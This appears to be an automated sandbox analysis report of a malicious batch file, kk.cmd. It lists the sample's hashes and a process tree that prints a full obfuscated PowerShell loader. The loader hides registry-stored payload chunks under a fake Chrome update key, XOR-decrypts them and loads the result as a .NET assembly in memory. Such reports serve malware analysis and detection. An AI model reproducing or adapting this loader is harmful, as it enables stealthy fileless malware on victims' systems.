Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64 arch:x86 image:win7-20241010-en locale:en-us os:windows7-x64 system
  • submitted
    19-12-2024 18:01

General

  • Target

    kk.cmd

  • Size

    4.2MB

  • MD5

    dd89f166318c7640673dc83253874f85

  • SHA1

    c6d10f65f6ff4df23404ac521f1d3db79264657e

  • SHA256

    9c3d53c7723bfdd037df85de4c26efcd5e6f4ad58cc24f7a38a774bf22de3876

  • SHA512

    c2c61f22626a862ad4622c98473ef62453e8c0f966e9a8f811f2ff3151af424215bab527a21fe3d7f7de44e674a2f116edc915e5774817acb401980ab27fcda5

  • SSDEEP

    49152:r2wTjdVohnHVy2BvdhqhKFLHVr1vpvnIALaU8:J

Score
1/10

Malware Config

Signatures

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\kk.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2152
    • C:\Windows\system32\conhost.exe
      conhost --headless powershell -nop -w hidden -c " $kdot_file='C:\Users\Admin\AppData\Local\Temp\kk.cmd';${`KdotgWed`WfojJw} = .([char]((13 - 1378 - 3780 + 5216))+[char](((4676 -Band 1964) + (4676 -Bor 1964) + 3244 - 9783))+[char]((10304 - 110 - 501 - 9577))+[char](((-15629 -Band 8806) + (-15629 -Bor 8806) + 5769 + 1099))+[char]((7825 - 8014 - 2335 + 2591))+[char](((-5358 -Band 8947) + (-5358 -Bor 8947) - 8209 + 4731))+[char]((18347 - 9370 - 2385 - 6482))+[char]((15441 - 1573 - 3971 - 9781))+[char](((-16233 -Band 2524) + (-16233 -Bor 2524) + 6390 + 7420))+[char](((-9714 -Band 5556) + (-9714 -Bor 5556) - 42 + 4310))+[char](((-739 -Band 7118) + (-739 -Bor 7118) + 358 - 6621))) $Kdot_fIle -Raw;${kd`OtyMlvypznrx} = ([System.texT.eNcODiNG]::UtF8.GetStRIng((0x48, 0x4b, 67, 0x55, 0x3a, 92, 83, 0x6f, 0x66, 116, 119, 0x61, 0x72, 0x65, 0x5c, 0x43, 0x68, 0x72, 111, 109)) + [SYstem.TexT.eNCOdIng]::utF8.GETsTrInG((101, 85, 112, 100, 97, 116, 101)));if (-not (.([char](((-11673 -Band 6638) + (-11673 -Bor 6638) - 1202 + 6321))+[char]((11389 - 5688 + 2237 - 7837))+[char](((4283 -Band 7213) + (4283 -Bor 7213) - 6589 - 4792))+[char]((-7138 - 7728 + 9322 + 5660))+[char]((-1708 - 2423 + 9091 - 4915))+[char](((-1052 -Band 3453) + (-1052 -Bor 3453) - 6782 + 4461))+[char]((8989 - 6838 - 4852 + 2798))+[char](((2556 -Band 2244) + (2556 -Bor 2244) + 4520 - 9204))+[char]((3135 - 8793 + 4478 + 1284))) ${kd`Otym`LvYpZnrx})) { .([char](((6306 -Band 1379) + (6306 -Bor 1379) + 1030 - 8637))+[char]((4345 - 8871 - 5118 + 9745))+[char]((11644 - 9472 + 415 - 2468))+[char]((-4904 - 8931 + 6266 + 7614))+[char](((1636 -Band 9043) + (1636 -Bor 9043) - 7129 - 3477))+[char]((2317 - 8117 + 6579 - 663))+[char](((-8980 -Band 9997) + (-8980 -Bor 9997) + 6956 - 7872))+[char](((-5852 -Band 9977) + (-5852 -Bor 9977) - 6312 + 2296))) -Path ${kdOt`Ymlv`Ypznrx} -Force };1..3 | .([char]((13652 - 3627 - 164 - 9824))) {.([char]((-11298 - 1866 + 3254 + 9993))+[char](((-1551 -Band 5849) + (-1551 -Bor 5849) + 4465 - 
8662))+[char]((-5499 - 7553 + 7140 + 6028))+[char](((1649 -Band 7342) + (1649 -Bor 7342) - 4704 - 4242))+[char]((-3070 - 3172 + 5411 + 904))+[char]((7010 - 5201 + 7155 - 8848))+[char](((-11871 -Band 2986) + (-11871 -Bor 2986) + 9632 - 646))+[char]((412 - 5856 + 5980 - 427))+[char](((4457 -Band 7882) + (4457 -Bor 7882) - 7084 - 5175))+[char]((6474 - 8821 + 2738 - 277))+[char](((-12218 -Band 6766) + (-12218 -Bor 6766) + 7285 - 1722))+[char](((-10210 -Band 6774) + (-10210 -Bor 6774) + 8883 - 5335))+[char](((6092 -Band 3541) + (6092 -Bor 3541) - 3025 - 6507))+[char](((-16166 -Band 7383) + (-16166 -Bor 7383) + 9786 - 889))+[char]((3038 - 9578 + 1566 + 5090))+[char](((6145 -Band 7511) + (6145 -Bor 7511) - 6325 - 7210))) -Path ${kdOtYMlvyPznrx} -Name (([SysteM.TexT.ENcodinG]::UTf8.GEtsTRINg((75, 0x44, 0x4f)) + [system.teXt.EncODiNG]::UTF8.GetStRIng([SySTem.cONVert]::FroMbASe64StRING('VA==')))+$_) -Value (${`K`DoTg`WeDWf`Ojjw} | .([char](((-14443 -Band 7542) + (-14443 -Bor 7542) + 2962 + 4022))+[char]((16547 - 3435 - 9446 - 3565))+[char](((5939 -Band 951) + (5939 -Bor 951) - 603 - 6179))+[char]((25941 - 9295 - 7714 - 8831))+[char](((-14658 -Band 1515) + (-14658 -Bor 1515) + 6571 + 6671))+[char](((-6324 -Band 2857) + (-6324 -Bor 2857) - 32 + 3615))+[char](((15470 -Band 479) + (15470 -Bor 479) - 8463 - 7441))+[char](((4576 -Band 3834) + (4576 -Bor 3834) + 764 - 9091))+[char](((-12277 -Band 6674) + (-12277 -Bor 6674) - 1246 + 6965))+[char]((-2008 - 2344 + 4447 + 19))+[char](((7728 -Band 5699) + (7728 -Bor 5699) - 8958 - 4364))+[char](((-1171 -Band 8519) + (-1171 -Bor 8519) - 285 - 6953))+[char]((1491 - 849 - 5289 + 4750))) -Pattern (([sYStEm.TexT.enCODInG]::UTF8.GEtSTrInG((58, 0x4b, 68)) + [SysTeM.tExt.eNCOdIng]::uTf8.GeTSTRiNG((0x4f, 0x54)))+$_+([sysTEm.Text.ENCodInG]::utF8.GetsTriNG((0x3a, 0x3a, 0x28)) + [sYstEm.tEXT.enCodIng]::UTf8.gETStrInG((46, 42)) + [sYSTeM.teXT.eNcoDiNg]::UtF8.GetStRing((0x29))))).matCHEs.gRoUPs[1].vAluE -Force};.([char]((934 - 8315 + 4511 + 
2953))+[char]((6910 - 9015 + 9487 - 7281))+[char]((8374 - 9248 + 9141 - 8151))+[char](((9002 -Band 3523) + (9002 -Bor 3523) - 9834 - 2646))+[char](((3172 -Band 7600) + (3172 -Bor 7600) - 1242 - 9457))+[char](((174 -Band 7378) + (174 -Bor 7378) - 7613 + 177))+[char](((-22737 -Band 7186) + (-22737 -Bor 7186) + 9850 + 5802))+[char](((-13731 -Band 671) + (-13731 -Bor 671) + 4826 + 8343))+[char](((-13519 -Band 9113) + (-13519 -Bor 9113) + 338 + 4148))+[char](((-12650 -Band 4594) + (-12650 -Bor 4594) - 971 + 9141))+[char](((6095 -Band 3270) + (6095 -Bor 3270) - 6816 - 2438))+[char]((22276 - 8612 - 3677 - 9875))+[char]((3860 - 7729 + 5642 - 1672))+[char](((3457 -Band 2667) + (3457 -Bor 2667) - 9936 + 3926))+[char]((9435 - 551 - 9637 + 869))+[char](((5027 -Band 6422) + (5027 -Bor 6422) - 9585 - 1743))) -Path ${kdotYmlvYpznrx} -Name ([SyStem.TeXT.ENCODinG]::utF8.GeTsTriNG([sysTem.CoNverT]::FROMbASe64STRing('S0RP')) + [SyStem.TEXt.enCodING]::utF8.GetStRINg((0x54, 0x34))) -Value ([sySTEm.teXt.encODINg]::uTF8.GeTsTRiNG((0x7a, 0x39, 0x61, 0x4d, 0x6c, 0x35, 0x57, 0x44, 0x43, 0x55, 0x4f, 0x6b, 0x37, 0x42, 0x4e, 0x34))) -Force;${KdOt`MjQ`N`VwecpW} = [SyStem.Text.eNcoDing]::UTf8.GEtbyTES((.([char]((14702 - 6998 + 113 - 7746))+[char](((8253 -Band 2702) + (8253 -Bor 2702) - 4927 - 5927))+[char](((-7844 -Band 9851) + (-7844 -Bor 9851) - 2777 + 886))+[char]((-13280 - 2082 + 8548 + 6859))+[char](((-8699 -Band 9563) + (-8699 -Bor 9563) + 4687 - 5478))+[char]((878 - 896 - 302 + 436))+[char]((11225 - 3972 - 7490 + 338))+[char]((-5341 - 8147 + 4227 + 9370))+[char]((-7848 - 4210 + 4385 + 7753))+[char]((-2173 - 968 + 691 + 2564))+[char](((-22715 -Band 9259) + (-22715 -Bor 9259) + 3653 + 9914))+[char](((-5947 -Band 5212) + (-5947 -Bor 5212) - 237 + 1084))+[char]((6804 - 243 - 6867 + 407))+[char](((-103 -Band 1345) + (-103 -Bor 1345) - 1654 + 526))+[char](((-2605 -Band 4830) + (-2605 -Bor 4830) - 9666 + 7557))+[char]((12848 - 7662 - 9177 + 4112))) -Path ${KdOtym`Lvy`P`Znrx} 
KDOT4).kDOT4);${KDOtnpTIeKZsez} = [conVert]::fRoMbase64StRInG((.([char]((4388 - 7071 + 2774 - 20))+[char]((1699 - 9928 - 1346 + 9676))+[char](((2716 -Band 723) + (2716 -Bor 723) + 335 - 3658))+[char](((9601 -Band 1692) + (9601 -Bor 1692) - 7558 - 3690))+[char]((8426 - 3054 - 6911 + 1612))+[char]((-6327 - 4578 + 8457 + 2564))+[char](((-16629 -Band 7610) + (-16629 -Bor 7610) + 8111 + 1009))+[char](((-12364 -Band 5587) + (-12364 -Bor 5587) + 1664 + 5222))+[char]((10883 - 3871 - 3704 - 3228))+[char]((10287 - 1089 - 822 - 8262))+[char](((5500 -Band 5314) + (5500 -Bor 5314) - 5527 - 5176))+[char]((20237 - 8692 - 5360 - 6073))+[char](((56 -Band 2560) + (56 -Bor 2560) - 3107 + 592))+[char](((-1619 -Band 4538) + (-1619 -Bor 4538) - 6034 + 3229))+[char]((-10383 - 624 + 2341 + 8782))+[char](((-15145 -Band 6387) + (-15145 -Bor 6387) + 8799 + 80))) -Path ${kDotYMLvYpznrX} KDOT1).kDOT1);${kdOtaelspVrPCf} = [byTE[]]::NEW(${KDotnPTiek`ZSez}.LenGTH);for (${KDO`TvByytHcxDm}=0;${`KdotvB`Yyth`CxDm} -lt ${kDoTnptIEkzSez}.LengTH;${KdoTvb`YYtHc`Xd`M}++) {${kdOt`AelSp`VrpCf}[${kdOtvBYythcXdm}]=${`KdO`TnPT`I`Ekz`SEZ}[${`Kd`OtvbY`YtH`CxDm}] -bxor ${Kdot`Mj`Qnv`Wec`PW}[${kDoTvbyYthCX`Dm} % ${KDOtMJqNVwecp`W}.LeNGth]};[sySTEm.REFlECTiOn.ASsEmBLy]::LOaD(${`KdOtae`LsPvr`P`Cf}).eNTrYPoiNt.INvoKE($null,@(,[string[]]@()))"
      2⤵
        PID:2800
